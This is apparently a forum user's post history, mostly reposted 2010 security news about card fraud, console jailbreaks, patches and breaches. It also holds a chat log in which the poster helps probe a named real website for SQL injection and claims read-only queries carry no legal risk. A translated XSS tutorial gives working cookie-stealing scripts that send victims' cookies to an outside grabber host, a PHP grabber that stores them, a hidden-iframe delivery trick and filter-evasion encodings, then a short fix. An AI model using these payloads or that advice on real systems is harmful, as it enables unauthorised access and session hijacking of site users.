Everything posted by Dragos
-
A man accused of being one of the most prolific sellers of credit-card data has been charged with participating in the brazen hack of RBS WorldPay in 2008 that funneled about $9.4m out of the payment processor in just 12 hours. Vladislav Anatolievich Horohorin, 27, was already in the custody of French police following his arrest three weeks ago on charges he sold huge “dumps” of stolen credit-card data. An alleged founder of CarderPlanet, a notorious clearinghouse for payment-card fraudsters, Horohorin has been awaiting extradition to the US. Prosecutors are wasting no time capitalizing on the capture of the high-profile suspect. Last week, they added Horohorin to the list of people accused of hacking into the computer system of Atlanta-based RBS WorldPay and retrieving payment card data as it was being processed. After raising the amount of funds available on the cards, the gang dispatched cashers in 280 cities worldwide to withdraw money from automatic teller machines, according to court papers. The charges were first made in an indictment filed in November. According to the superseding indictment, Horohorin was one of the cashers in the scheme. He was assigned a single payment card that he used at ATMs in Moscow to withdraw almost $126,000 on November 8, 2008. He is charged with one count each of wire fraud and access device fraud. The court papers outline one of the more profitable hacking crimes in recent memory. Horohorin's inclusion brings to nine the number of people charged. Earlier this month, US authorities said three of the men believed to have orchestrated the attack were arrested in Russia. A PDF of the indictment is here. CarderPlanet founder charged in $9.4m RBS WorldPay hack | The Register
-
That dance is called tektonik..
-
Don't satisfy your curiosity by logging into those accounts, because you get automatically blocked from db5. The accounts are made for certain neighbourhoods and certain IP classes.
-
(06:24:54 PM) krisler12: hi
(06:24:59 PM) Dragos: hey
(06:24:59 PM) Dragos: go on
(06:25:06 PM) krisler12: are you good at sqli?
(06:25:10 PM) Dragos: why?
(06:25:19 PM) krisler12: I want to ask you something
(06:25:29 PM) krisler12: more precisely, to tell me how to get past a firewall
(06:25:36 PM) krisler12: do you know techniques like that?
(06:25:46 PM) Dragos: get past a firewall using sqli?
(06:25:53 PM) krisler12: yes
(06:26:02 PM) krisler12: because it has a firewall on certain words
(06:26:08 PM) krisler12: and if you do union
(06:26:11 PM) krisler12: it doesn't let you
(06:26:16 PM) krisler12: are you good at it?
(06:26:18 PM) Dragos: for fuck's sake, that's called a FILTER, not a firewall
(06:26:30 PM) krisler12: someone told me it's a firewall
(06:26:35 PM) krisler12: anyway
(06:26:38 PM) krisler12: are you good at it?
(06:26:40 PM) Dragos: yes
(06:26:45 PM) krisler12: ok
(06:26:53 PM) krisler12: go to ancs.ro
(06:26:58 PM) krisler12: and see that it's vulnerable
(06:27:20 PM) krisler12: did you go?
(06:27:34 PM) Dragos: it has 2 columns
(06:27:42 PM) krisler12: that's what I saw too
(06:27:43 PM) krisler12: so tell me
(06:27:49 PM) krisler12: do you use a proxy?
(06:27:53 PM) Dragos: yes
(06:27:57 PM) krisler12: which one?
(06:28:05 PM) Dragos: meaning?
(06:28:11 PM) krisler12: the private one or the one from smair?
(06:28:19 PM) Dragos: the private one
(06:28:25 PM) krisler12: aha
(06:28:40 PM) krisler12: but if you don't use one, can something happen to you?
(06:28:47 PM) krisler12: I'm asking because I loaded it without one
(06:28:48 PM) krisler12:
(06:28:52 PM) krisler12:
(06:28:53 PM) Dragos: yes
(06:29:06 PM) krisler12: even if I didn't do anything?
(06:29:27 PM) Dragos: if they feel like it
(06:29:27 PM) Dragos: yes
(06:29:37 PM) krisler12: oops
(06:29:39 PM) krisler12:
(06:29:45 PM) krisler12: what do you think, will I get in trouble?
(06:30:05 PM) Dragos: with the kind of nonsense you write on rst, no
(06:30:15 PM) krisler12: no
(06:30:31 PM) krisler12: I mean the fact that I tried to do sqli on those guys
(06:30:40 PM) krisler12: and I also used some programs to see if it works
(06:30:40 PM) Dragos: I'm referring to your thinking, they won't do anything to you
(06:30:47 PM) krisler12: why?
(06:31:13 PM) Dragos: fuck, you've annoyed me again
(06:31:22 PM) krisler12: what does one have to do with the other?
(06:31:30 PM) Dragos: IF YOU ONLY DO SELECT, NOTHING HAPPENS TO YOU
(06:31:45 PM) krisler12: but in what case does something happen?
(06:31:49 PM) Dragos: IF YOU MODIFY THEIR DB THEY CAN CALL THE POLICE
(06:31:55 PM) krisler12: aaa
(06:31:56 PM) krisler12: ok
(06:32:03 PM) krisler12: are you still on that site?
(06:32:07 PM) Dragos: no
(06:32:10 PM) krisler12: because I want you to see something
(06:32:20 PM) krisler12: go in again so I can show you something interesting
(06:32:25 PM) Dragos: what the fuck am I supposed to see?
(06:32:32 PM) krisler12: come on, you'll see
(06:32:36 PM) krisler12: go in for a bit
(06:32:40 PM) krisler12: it's not like there are viruses
(06:32:54 PM) krisler12: did you go?
(06:33:03 PM) Dragos: yes
(06:33:06 PM) krisler12: so
(06:33:07 PM) Dragos: amaze me
(06:33:11 PM) krisler12: you said there are 2 columns
(06:33:23 PM) krisler12: did you see it also gives you the db name
(06:33:24 PM) krisler12: everything
(06:33:26 PM) Dragos: yes..
(06:33:31 PM) krisler12: well
(06:33:39 PM) Dragos: it's crap
(06:33:41 PM) krisler12: how do you do union all select on this site?
(06:33:51 PM) krisler12: because it doesn't work for me?
(06:34:00 PM) Dragos: fuck, I'm posting this conversation on rst later...
(06:38:36 PM) krisler12: take it off rst, man
(06:38:58 PM) krisler12: at least change the site's name, because some idiot might find it and hack it
(06:39:12 PM) Dragos: lol..
(06:39:17 PM) Dragos: I don't care
(06:39:25 PM) Dragos: if someone finds it, so be it
(06:39:40 PM) krisler12: come on man, please, my ip is on there
(06:39:55 PM) Dragos: what ip?
(06:40:07 PM) krisler12: well, didn't I tell you I went in without a proxy
(06:40:19 PM) krisler12: and if someone finds it they'll think it was me
-
I was doing stuff like this back in 2004-2005. Man, grow up!
-
Sony has won a temporary ban to prevent Australian distributors selling a hardware hack for the PlayStation 3 (PS3). The PS3Jailbreak "dongle" allows gamers to play homemade and pirated games on the console. The ban prevents OzModChips, Mod Supplier and Quantronics from importing, distributing or selling the device. Sony has until August 31 to make its case to the court for a permanent ban. If it fails, the chips could go on sale on 1 September. The firm declined to comment on the proceedings. The Australian distributors could not be reached. The court order also gives Sony control of all of the dongles in the firms' possession and allows the electronics giant to test the devices - including "destructive analysis" - to see how they work.
Homebrew games
PS3Jailbreak is a dongle containing software that allows users to save games to the console's hard drive. It is the first product to crack the security on the PS3. It was met with scepticism when videos of the device - posted by OzModChips - first appeared online in early August. At the time, a spokesperson for Console Pro, another distributor based in the Netherlands, told BBC News the "dongle converts a retail unit into a dev unit". Dev units are used by developers to test code for the machine. "Dev mode means it will run any - even unsigned - code," said the spokesperson. "Using a simple backup maker or player software, you can play backed-up [saved] games without the actual disc being in the PS3." The legality of these products - commonly called modchips - differs by country. In Australia they are legal, whilst in the UK a recent court case brought by Nintendo said that "game copiers" were illegal to import, advertise or sell. Proponents of modchips say they are the only way to play homemade games, known as "homebrews". It is not known whether distributors in other countries have been served similar notices.
But, a spokesperson for Console Pro told BBC News in the wake of Friday's ban that the firm had "not heard anything from Sony or any lawyer or court yet". "I really doubt Sony has grounds to ban this dongle." BBC News - Sony obtains Australia ban on PS3 hack chip
-
Data loss prevention (DLP) is an emerging field with many different products and players. The idea is to stop information from leaving your internal networks in close to real time, so you can identify the leaker or thief before too much damage (and the ensuing lawsuits) happens. A recent study by DLP vendor Proofpoint found that more than a third of the respondents had an incident in the last year, and a quarter of them had investigated leaked information as a result of a blog post. There are more than a dozen different DLP vendors. We show you three typical products, how they work, and what kinds of information they track:
* Global Velocity's GV-2010 security appliance,
* BlueCoat Networks' DLP appliance, and
* Sendmail's Sentrion email server.
Each is designed for somewhat different situations, which is why we have collected them together. Before you dive into these products, you might want to address the following questions:
* Who will own the DLP process in your organization: the general IT staff, the infrastructure management group, the desktop security group, or some other combination? This ownership may determine which collection of DLP products fits.
* Where does DLP presently touch your existing IT security infrastructure? Most firewalls and email servers have some DLP capabilities; the tricky part is being consistent across your enterprise and getting a specialized DLP product that can complement, and in some cases work with, these legacy devices.
* Are you looking at total DLP protection, for endpoints, data in motion and file server data? No single product can handle all of these situations, so how each vendor partners and integrates with others for complete coverage is critical.
* Do you want something to decrypt emails and https traffic? Not all products can see inside these protocols without some additional work.
All three products can scan for particular character strings (like a Social Security or credit card number pattern) and can also take uploaded sensitive documents into their scanning engines to ensure that this specific unstructured information is protected too. Another typical situation is a rogue employee sending a customer database list to a personal Gmail or Yahoo mail account, then downloading or forwarding it once at home. Each product has a variety of reports to show you incidents flagged by the protective policies and what information was leaked. How to prevent data from leaving your network | ITworld
-
33171 - 33000 = 171
-
The developers of the uTorrent file-sharing application have released an updated version that fixes a problem that could allow an attacker to load malicious code onto a user's computer. The problem, known as DLL (dynamic link library) load hijacking, affects dozens of commonly used Windows applications. The flaw can allow an attacker to trick an application into loading what it thinks is a DLL but actually is a malicious file. A DLL is a piece of code that can be used by more than one application. The issue affects more than 40 applications including the Safari and Firefox browsers, many Microsoft and Adobe Systems applications and others including Skype and uTorrent. uTorrent version 2.0.4 fixes the problem, although the company behind the application, BitTorrent, said that no attacks have been reported despite a working exploit. "The new client disables loading of DLLs from the current working directory and prevents this exploit from functioning," according to the posting. "We take our users' security very seriously, and we sincerely apologize for any inconvenience." The DLL problem isn't specific to the Windows OS, and Microsoft can't issue a patch that makes all of the applications safe. Application developers and companies need to develop their own specific patches. uTorrent is a free BitTorrent client application that manages the downloading of content from the peer-to-peer system, which uses small information files called torrents to coordinate downloads. uTorrent patches application against DLL vulnerability | ITworld
-
A government training organisation - the National Skills Academy - has had its home page hacked and replaced by a message supporting Palestine. Much of the rest of the site is still working but the front page has been replaced with a picture of a container ship with Gaza on the side and a gloating message from hacker JaCKal. It says: "Virtual Protests will continue..! Everything for PALESTINE! JaCKal Ownz Your System. I came challengeing to the world THE END." The National Skills Academies, according to the bit of its website which hasn't been hacked, are "employer-led centres of training excellence". They're split into 14 different areas including construction, financial services and creative and cultural skills - these bits seem to have kept JaCKal out. A spokeswoman for the National Skills Academy told us their techies were in the process of taking the website down. She did not say when the hack happened or how it had happened. Pro-Palestine hackers spraypaint gov training quango | The Register
-
Hey man, I translated the tutorial into English. The original tutorial with the PDF can be found in the Tutoriale in romana section.
-
About Cross Site Scripting
Author: Synthesis
Website: www.rstcenter.com

1. Introduction

This article is dedicated to a web vulnerability called Cross Site Scripting. The examples throughout the article are written in Cascading Style Sheets (CSS), HyperText Markup Language (HTML), PHP: Hypertext Preprocessor (PHP), JavaScript (JS) and Visual Basic Script (VBScript).

2. Definition

Cross Site Scripting (abbreviated XSS) is a web vulnerability that allows a user to inject their own script into a web page. This script may affect other users who view the infected page (a client-side vulnerability). This vulnerability is dangerous only when the code affects cookies or sessions.

2.1 About cookies

A cookie is a piece of text, often encrypted, sent by a server to a web browser. The browser stores the cookie and sends it back unchanged whenever the user accesses that server. Overall, a cookie can be viewed as a key to log on to that server. Cookies are usually created after the user has logged on to a site. After stealing a cookie from the victim, the attacker can use it to authenticate on the site with the victim's identity. Cookies can be reached easily using JavaScript. A cookie grabber is most often used to capture cookies. The cookie grabber is a script that receives the victim's cookies through GET and stores them in a database.

2.2 Types of XSS

There are two types of XSS.

2.2.1 Non-persistent XSS

Non-persistent XSS (also known as reflected or temporary XSS) affects the user only if he accesses the infected link. This type of XSS is the most common. Let's take a site's search engine as an example. In some cases, when it doesn't find what the user requested, it displays a message like:

<?php echo $_GET['q']; ?> was not found.

Because the search engine displays the information requested by the user unfiltered, we can enter various codes to infect the page.

2.2.2 Persistent XSS

Persistent (stored, permanent) XSS is XSS that is stored by the site. This type of XSS is the most dangerous because the script is entered once and affects other users as long as it remains on the page. Most often, we find persistent XSS on sites that display the latest searches.

3. How does an XSS occur?

An XSS occurs when the input is not filtered (or is filtered incorrectly). Most of the time, the page reads a variable through GET and then displays its value in the web browser. There is also XSS via POST, but it is slightly more difficult to exploit.

4. Exploiting an XSS through GET

Let's consider the following code:

<form action="" method="GET">
    <input type="text" value="" name="text">
    <input type="submit" value="Search">
</form>
<?php echo stripslashes($_GET['text']); ?>

The code above is a form with a text box and a button. After you write something in the text box and click the Search button, the form sends the information to the PHP code, which receives it as yourpage.php?text=InformationFromForm and displays it. How can we exploit this form?

4.1 Inserting JavaScript code in the form

JavaScript is an object-oriented programming language. It is used to add different features to a web page. JavaScript has the advantage that it runs on your computer, without requiring an Internet connection. In the form above, we can insert any JavaScript code. This script will be executed as soon as we hit the Search button. For example, if we insert the code below into the form, the web browser will display an alert box with the text Message.

<script language="JavaScript">alert("Message")</script>

4.1.1 Cookie grabber

As I said earlier, a cookie can be stolen using a cookie grabber. In order to steal a cookie, the attacker must redirect the victim to his cookie grabber. In this case we can use document.location:

<script language="JavaScript">document.location="http://www.site.com/cookiegrabber/index.php?victimcookie="+document.cookie;</script>

Now, how does a cookie grabber work? Easy! The PHP code takes the information using GET (victimcookie in the example above) and saves it in a database. A cookie grabber example for the code above:

<?php
/* Cookie Grabber Example */

// MySQL database connection settings
$host = 'localhost';
$name = 'root';
$password = 'password';
$database = 'database1';

// Connecting to the database
$connect = mysql_connect($host, $name, $password) or die(mysql_error());
mysql_select_db($database) or die(mysql_error());

// Taking the cookie using GET
$cookie = isset($_GET['victimcookie']) ? $_GET['victimcookie'] : '';

// Victim's referer ($_SERVER replaces the old register_globals variable $HTTP_REFERER)
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

// Conditional statements
if ($cookie == "") {
    // If the user accesses the page and GET is empty, he is redirected to Google
    header('Location: http://www.google.com/');
} else {
    // We insert the cookie and the referer into the database
    mysql_query("INSERT INTO Cookies (Cookie, Link) VALUES ('$cookie','$referer')");
    // We close the connection to the database
    mysql_close($connect);
    // We redirect the user to Google
    header('Location: http://www.google.com/');
}
?>

There is a chance the victim will notice that the link is not quite right and won't open it. No problem! We can use an iframe:

<iframe src="http://site.com/script.php?text=<script>document.location.href='http://server2.com/grabber.php?cookie='+escape(document.cookie)</script>" width="0" height="0"></iframe>

4.2 Inserting VBScript code in the form

VBScript is a programming language created by Microsoft, which underlies the ASP programming language. VBScript is executed only by the Internet Explorer browser. To display the same alert box as above, we write the following code in the form and click the Search button:

<script language="VBScript">MsgBox "Message"</script>

4.3 Inserting CSS code in the form

CSS is used for formatting HTML documents. The CSS code below displays the alert box with the text Message (as above).

<style type="text/css">body{background-image: url('javascript:alert("Message");');}</style>

XSS using CSS is old and works only on older browsers such as Internet Explorer 6.

4.4 Ways to encode your script

There are several ways to encode your script so that it can be placed in a vulnerable form. Below I'll show you three known methods.

4.4.1 Hexadecimal

Hexadecimal is a positional numeral system with a radix, or base, of 16. It uses sixteen distinct symbols, most often the symbols 0–9 to represent values zero to nine, and A, B, C, D, E, F (or alternatively a through f) to represent values ten to fifteen. Sometimes, when information is submitted through a form (search form, login form, etc.), the script checks whether it contains certain strings such as "<script>", "alert", "document.location", "window.location" or others. We can replace these strings with their hexadecimal values. The PHP function below converts any string to hexadecimal.

<?php
// Returns the hexadecimal representation of every byte of $string
function code_hex($string)
{
    $hex = '';
    for ($i = 0; $i < strlen($string); $i++) {
        $hex .= dechex(ord($string[$i]));
    }
    return $hex;
}
?>

4.4.2 Unicode

Unicode is a standard for encoding, storing and interpreting text. It is used to encode JavaScript scripts. Below is a JavaScript function that converts a script into a String.fromCharCode() call using charCodeAt.

<script type="text/javascript">
// Builds a String.fromCharCode(...) expression that evaluates to the given string
function encode_Unicode(string) {
    if (string == "") {
        alert('The string can not be empty.');
        return "";
    }
    var syn = "String.fromCharCode(";
    for (var i = 0; i < string.length; i++) {
        syn += string.charCodeAt(i) + ",";
    }
    syn = syn.substring(0, syn.length - 1); // drop the trailing comma
    syn += ")";
    return syn;
}
</script>

4.4.3 Double Encoding

This method consists of encoding the script twice in order to bypass security filters or to execute certain commands. We can bypass the security filters because the server decodes the information only once. The second decoding is done by the backend platforms or modules, which usually have no security checks. This technique is not used only for XSS, but also for other types of web attacks such as LFI and RFI. Let's consider the following JavaScript code:

<script>alert("Message")</script>

First, we convert the HTML characters to their hex (URL-encoded) values:

%3Cscript%3Ealert%28%22Message%22%29%3C%2Fscript%3E

The sign for double encoding is %. In the hexadecimal (URL-encoded) form it is represented by %25, so we prefix every encoded HTML character with %25. The code becomes:

%253Cscript%253Ealert%2528%2522Message%2522%2529%253C%252Fscript%253E

4.5 Other ways to exploit an XSS

There are many methods for exploiting an XSS.

4.5.1 XSS using the IMG tag

<IMG SRC=javascript:alert("Message");>
<IMG SRC=vbscript:msgbox("Message");>

4.5.2 XSS imported from another site

<SCRIPT SRC=http://www.site.com/xss.js></SCRIPT>

The file xss.js contains:

alert("Message");

4.5.3 Malformed HTML tags

<IMG src="""><SCRIPT>alert("Message")<%2FSCRIPT>">

5. Methods to protect ourselves from XSS

XSS can be easily fixed. PHP provides two functions that do the same thing: htmlentities and htmlspecialchars. These functions convert special characters like "<", ">", "&" and quotes into HTML entities. So the browser will display the text, but won't execute the injected code. Let's add one of these functions to the form above:

<form action="" method="GET">
    <input type="text" value="" name="text">
    <input type="submit" value="Search">
</form>
<?php echo htmlentities(stripslashes($_GET['text']), ENT_QUOTES); ?>

6. Ending

In this article we talked about what XSS is, how many types of XSS there are, how we can exploit an XSS and how we can protect ourselves from XSS. If you have questions, send me an email at the address listed at the beginning.
-
Google is taking on internet telephone companies like Skype by allowing users to call from its free web-based email service. The service allows users to make calls to land lines and mobiles from inside their Gmail account. Phoning anywhere in the US and Canada will be free until the end of the year, while calls to the UK, France, China and Germany will cost 2 cents a minute. Until now Google offered computer-to-computer voice and video chat services. "This is a real big deal because now hundreds of millions of Gmail users can make phone calls right from their Gmail page," Craig Walker, product manager for real-time communications, told BBC News. "They don't need to download an additional application or anything to start making really high-quality low-cost calls. For the user it means much more efficient and low-cost communications." The product will initially be rolled out in the US, the firm said. However, for a brief time, international users were also able to use the feature because of an error. "Unintentionally we briefly made the service available to non-US English users," a spokesperson said. "We do hope to bring it to our international users soon." When it rolls out, the product link will appear on the left hand side of the Gmail page within the "chat" window. A "call phone" option will pop up along with a number pad to let you dial the number of the person you want to talk to. Google said money raised from international calls will pay for the free US and Canadian calls. "What surprised me was that they actually said they hope to make money off the calls," said Danny Sullivan, editor-in-chief of technology blog SearchEngineLand. "Normally Google is like 'We don't know how we are going to make the money' or 'We will make money down the way, don't worry about it' and this stands out as a big benefit that they get actual revenue early on."
Competition
Skype, which is the most successful internet phone offering, claims to have over 560 million registered users. The firm said 124 million used the service at least once a month while 8.1 million were paying customers. The company is planning to offer shares to the public later this year. Observers said that it is too early to say whether companies like Skype should be worried. "Skype is a well known company in this place and they are almost like a verb in the internet calling world in the way Google is with search. You Skype someone. So I think there is some inertia there to get over and I am interested to see how Gmail users respond," said Tom Krazit, senior writer with technology news site CNET.com. "But you always have to worry when Google comes after what you do. They don't do things half way and bring a lot of resources to any problem they try to tackle. It doesn't mean you are doomed. "Google's product won't work on your mobile browser so Skype has an advantage there but I don't think it is a stretch to assume Google will come out with a mobile version pretty soon," said Mr Krazit. The company plans an eye-catching way to get non-Gmail users to give the product a go. It is in negotiations with a number of university campuses and airports to install red telephone boxes around the country to give users the chance to dial and try. BBC News - Google offers free voice calls via Gmail
-
Visa on Tuesday announced a set of security best practices for vendors of payment applications and for the systems integrators and resellers responsible for implementing and managing them. The guidelines are designed to address continuing vulnerabilities in the payment chain stemming from insecure implementations of the applications that are used in credit and debit card transactions, according to Eduardo Perez, Visa's head of global payment system security. The existing Payment Application Data Security Standard (PA-DSS), administered by the PCI Security Council, already requires developers of payment applications to implement specific security controls in their software. For instance, the standard requires application vendors and developers to ensure their applications do not store prohibited cardholder and authentication data. However, while the software itself may be secure, several vulnerabilities continue to persist because of improper configurations and other implementation errors, Perez said. Visa's best practices are a natural extension to the PA-DSS requirements, Perez said. "What we have done is to go a bit beyond these requirements. PA-DSS is about secure payment applications and not about their secure implementation and management." Visa's guidelines were developed in collaboration with the SANS Institute, a Bethesda, Md.-based security training and certification organization. The best practices touch upon 10 different issues and include a mix of technology and process-related advice. For instance, the best practices urge developers and systems integrators to conduct application vulnerability detection tests and code reviews for detecting common vulnerabilities. They also urge them to adhere to secure software development practices and to actively work at identifying and decommissioning payment applications that store PINs and other prohibited payment card data.
Visa's guidelines are part of a continuing effort by the company to get stakeholders within the payment industry to adopt some fairly fundamental security standards for protecting cardholder data. Tuesday's best practices, for instance, are similar to guidance the company has released previously on tokenization and encryption. The company has also been the most vigorous proponent of the PCI data security standard and is believed to be the most aggressive at enforcing compliance with the standard. In the past, several of Visa's best practices and guidelines have ended up being drafted into formal payment industry standards. Even the PA-DSS itself, for instance, was originally proposed by Visa as a set of best practices, but eventually became a formal PCI standard. Jaikumar Vijayan covers data security and privacy issues, financial services security and e-voting for Computerworld. Follow Jaikumar on Twitter at @jaivijayan, or subscribe to Jaikumar's RSS feed. His e-mail address is jvijayan@computerworld.com. Visa offers new guidance on securing payment applications | ITworld
-
Facebook and Twitter users are complaining about their accounts being compromised and then being used to spam friends with suspicious "free iPad offers." Twitter warned users of the scam on Wednesday, saying that it was resetting passwords of affected users. "If you've received a message promising you a new iPad, not only is there no iPad, but also your friends have been hacked," Twitter said. The scam is also hitting Facebook users too, according to company spokesman Simon Axten. "It's affecting an extremely small percentage of people on Facebook, but we take all threats seriously," he said via e-mail. Gerome Stevens discovered that his Twitter account had been used to direct message contacts late Wednesday. He's not sure how the scammers got into his account, but they sent direct messages to his friends that said, "u have to check out this website its glitchin right now and sending out ipads to everyone for free!" He said the messages continued, even after he'd changed his password. The messages his friends received contained a link to better-gifts.net. That Web site asks for personal information, and then directs the user to a variety of promotional offers from legitimate companies such as Netflix, the Doubleday Book Club, and Columbia House DVD. Online marketing programs pay cash for Web traffic, and hackers have found that by phishing victims and then using that information to break into legitimate Twitter and Facebook accounts, they can earn money. This type of spam is particularly effective, because the messages appear to come from a trusted source. Scammers hit Twitter, Facebook, send free iPad spam | ITworld
-
Three teenagers from Colombia were killed 5 days after their names appeared on a "blacklist" posted on Facebook. Diego Ferney Jaramillo, aged 16, and Eibart Alejandro Ruiz Munoz, aged 17, were shot dead on August 15 while riding their motorcycles on one of the main roads of the city of Puerto Asis. Two days later, young people in the city received via Facebook a list containing 69 names, including those of the murdered youths. The teenagers were advised to leave the city, otherwise they would die. On August 20, Norbey Alexander Vargas, aged 19, the third teenager whose name was on the list, was also shot. Initially, the Colombian police considered the "blacklist" a macabre joke among teenagers, but the moment another 31 names were added, the parents panicked and the authorities launched an investigation. Later, the threats were extended in the form of flyers left on the windshields of the families' cars, which read: "As their relatives, please ask them to leave the city in less than three days, or we will be forced to carry out new acts like those of August 15." The parents of the targeted teenagers took their children and fled the city. According to the authorities, one of the two criminal organizations in the city could be behind the murders: Los Rastrojos and the Revolutionary Armed Forces of Colombia (FARC). Three teenagers killed after appearing on a "blacklist" on Facebook | Hit.ro
-
Security company AVG has released the results of an interesting study showing the risk of stumbling onto a malicious website around the world. The results show that the risk varies wildly from country to country. The riskiest place to surf the web is Turkey, where one in ten AVG users was faced with a potentially malicious website during the last week of July, when the study was conducted. At the other end of the scale, just one in 696 users in Sierra Leone was under threat. The great disparity is interesting, but it can be traced back to several factors. First and foremost, the research doesn't necessarily show the place where it's safest to use the Internet; it's more telling of user behavior than anything. The great differences between countries can also be attributed to internet use in each region. Africa has seven countries in the top ten safest places in the study, but it also has one of the lowest penetration rates on the planet. With electricity still unavailable to many on the continent, the internet is a luxury enjoyed by few. At the same time, Japan is the third safest country, with one in 403 users encountering an attack. Japan is one of the most connected countries on the planet, so adoption is not an issue here. In fact, it may very well be that the wide reach helps in this regard; users in Japan are generally more tech savvy. Users in Russia have more to worry about though. With one in 15 users facing an attack, it's the second riskiest country after Turkey. By continent, North America fares the worst, with one in 51 users at risk of an attack. South America is the safest, with the attack rate being one in 164. AVG looked at data from 127 million computers with its software installed from 144 countries, so it's safe to say that the study had a representative sample. Turkey and Russia Are the Riskiest Places to Go Online - Softpedia
-
Adobe has issued a security update to its Shockwave Player which patches quite a few critical vulnerabilities. Many of the vulnerabilities could have allowed attackers to execute arbitrary code on the target machine. Adobe Shockwave Player 11.5.8.612 closes 18 critical vulnerabilities. All previous versions of Shockwave are affected by the issues. In total, 20 security holes were plugged with the update. "Critical vulnerabilities have been identified in Adobe Shockwave Player 11.5.7.609 and earlier versions on the Windows and Macintosh operating systems," Adobe announced. "The vulnerabilities could allow an attacker, who successfully exploits these vulnerabilities, to run malicious code on the affected system. Adobe recommends users of Adobe Shockwave Player 11.5.7.609 and earlier versions update to Adobe Shockwave Player 11.5.8.612," the advisory continued. 16 of the issues were memory corruption vulnerabilities, all of which could have been exploited to run malicious code. A pointer offset vulnerability and an integer overflow vulnerability, which would also have enabled attackers to run code, were patched. Adobe credits the discovery of the vulnerabilities to independent researchers, groups and security companies. Rodrigo Rubira Branco of Check Point is credited for six critical vulnerabilities. Several researchers, including anonymous ones, used TippingPoint's Zero Day Initiative to uncover the vulnerabilities. The Adobe Shockwave Player enables users to run Adobe Director applications embedded in web pages. While not as popular as Adobe Flash Player, which is present on almost all of the computers in the world, at least those with access to an internet connection, Shockwave Player is still one of the most popular apps on the planet, with over half of computers, or more than 450 million, having it installed. Adobe Shockwave Player 11.5.8.612 Plugs 18 Critical Holes - Softpedia
-
Apple has purged Mac OS X of a browse-and-get-hacked vulnerability that first came to light three weeks ago, when the popular Jailbreakme service used it to root fully patched versions of the iPhone. The buffer overflow flaw in an OS component that parses fonts was one of 13 vulnerabilities Apple fixed in an update released on Tuesday. It allowed attackers to remotely execute malicious code on vulnerable machines simply by getting the user to view a booby-trapped PDF document. A related bug was patched two weeks ago in iOS, which powers the iPhone, the iPad and the iPod Touch. The vulnerability in the latter devices was being actively exploited by Jailbreakme, allowing users to jailbreak their device by doing nothing more than visiting the site and flicking a slider. There were no reports of the vulnerability being exploited in OS X. Tuesday's update also patched a hole in CFNetwork that allowed attackers to bypass secure sockets layer protection, and it fixed a variety of third-party components including ClamAV, Samba and PHP. The fixes came the same day that Adobe patched 20 holes in its widely used Shockwave Player. Apple kills Jailbreakme Mac bug | The Register
-
Wikileaks posted a classified CIA memo on Wednesday, three weeks after the Pentagon warned the self-described whistleblower website to return a huge cache of unpublished documents believed to be in its possession. The secret memo, titled “What If Foreigners See the United States as an 'Exporter of Terrorism?',” isn't likely to cause US intelligence officials to lose much sleep. It was drafted six months ago by members of the CIA's “Red Cell,” a unit established to offer agents food-for-thought on a host of issues. “These sorts of analytic products – clearly identified as coming from the Agency's 'Red Cell' – are designed to simply provoke thought and present different points of view,” the CIA said in a statement issued on Wednesday. Still, the release indicates that Wikileaks remains undaunted by veiled Pentagon threats following last month's airing of some 77,000 mostly classified records related to the US war in Afghanistan. Wikileaks founder Julian Assange said two weeks ago he would not be intimidated into suppressing an additional 15,000 documents he is still holding. He has said he's weeks away from releasing the documents, which some pundits have warned could be even more explosive than the first batch. The latest Wikileak also came on the same day that prosecutors in Sweden cleared Assange of sex-abuse charges, according to the Associated Press. He is still under investigation for “molestation,” an offense that's not considered a sex crime in that country and that covers “a wide range of offenses, including reckless conduct or inappropriate physical contact with another adult, and can result in fines or up to one year in prison,” the AP said. The charges were based on the accounts of two women who said consensual sex they had with Assange later turned non-consensual when he refused to use a condom, The Guardian reported Tuesday.
The three-page memo published Wednesday warns that the US could lose influence with allies it counts on to hunt out terrorists if its citizens based abroad are viewed as potential threats. “If the US were seen as an exporter of terrorism, foreign partners may be less willing to cooperate with the United States on extrajudicial activities, including detention, transfer, and interrogation of suspects in third party countries,” the memo, dated February 2, stated. Wikileaks publishes secret CIA memo | The Register
-
The Pentagon has opened the kimono on what it described as the “most significant breach of US military computers ever,” in which a flash drive in 2008 was used to infect large numbers of computers, including those used by the Central Command overseeing combat zones in Iraq and Afghanistan. When the device was plugged into a military laptop located on an undisclosed base in the Middle East, malicious code soon linked highly sensitive machines to networks controlled by an unnamed foreign intelligence agency, Deputy Defense Secretary William J. Lynn III wrote in the first official account of the episode. “That code spread undetected on both classified and unclassified systems, establishing what amounted to a digital beachhead, from which data could be transferred to servers under foreign control,” he wrote in an article to be published Wednesday, according to The Washington Post. “It was a network administrator's worst fear: a rogue program operating silently, poised to deliver operational plans into the hands of an unknown adversary.” Military officials responded with a counterattack known as Operation Buckshot Yankee, which Lynn characterized as a turning point in the Pentagon's computer defense strategy. Among the steps initially taken was the banning of USB devices by the Defense Department, a curb that has since been modified slightly. The account, included in the latest issue of Foreign Affairs, comes almost two years after The Los Angeles Times reported an unofficial account of the incident, which claimed it most likely originated in Russia. Wednesday's article signals attempts by the Pentagon to raise awareness of the growing vulnerability of the US military to computer-based attacks, which often allow adversaries with modest means to inflict disproportionate damage.
“A dozen determined computer programmers can, if they find a vulnerability to exploit, threaten the United States's global logistics network, steal its operational plans, blind its intelligence capabilities or hinder its ability to deliver weapons on target,” Lynn wrote. Last month, a retired US general made many of the same points, comparing the network world to the highly vulnerable North German plain that has been invaded repeatedly over the past several centuries. More coverage from The New York Times is here. Wired.com has an article here saying some Defense Department insiders doubt the attack was the work of a hostile government. Pentagon confirms attack breached classified network | The Register
-
The Home Office has said that new UK passports with 'strengthened security features' will be issued from October. To make the passports more secure, the chip which stores the holder's details has been moved to the inside of the passport cover so it will no longer be visible, the Home Office said. The new 10-year passport will also have a transparent covering which will display several holograms to protect the holder's personal details, and a secondary image of the holder printed onto the observations page. "Through its combination of physical and electronic security features, the UK passport remains one of the most secure and trusted documents in the world, meeting rigorous international standards," said Sarah Rapson, chief executive of the Identity and Passport Service. "The new design is part of our strategy to stay ahead of criminals who look to fraudulently alter or copy passports." Other new security features include images of well-known UK scenes that will be created through special printing techniques, "which will give UK citizens added protection from identity theft and fraud and ensure speedier travel across borders". As part of the redesign, the personal details page of the passport will be moved to the second page in the passport booklet. The Home Office hopes that this will help speed up travellers' passage through border controls. The new passport will replace the current UK ePassport, which was upgraded in 2006 with the addition of an electronic chip to hold the owner's details. De La Rue will take over the contract for passport production in October 2010 when the current contract expires. The value of the 10-year contract is £400m. Home Office unveils new UK 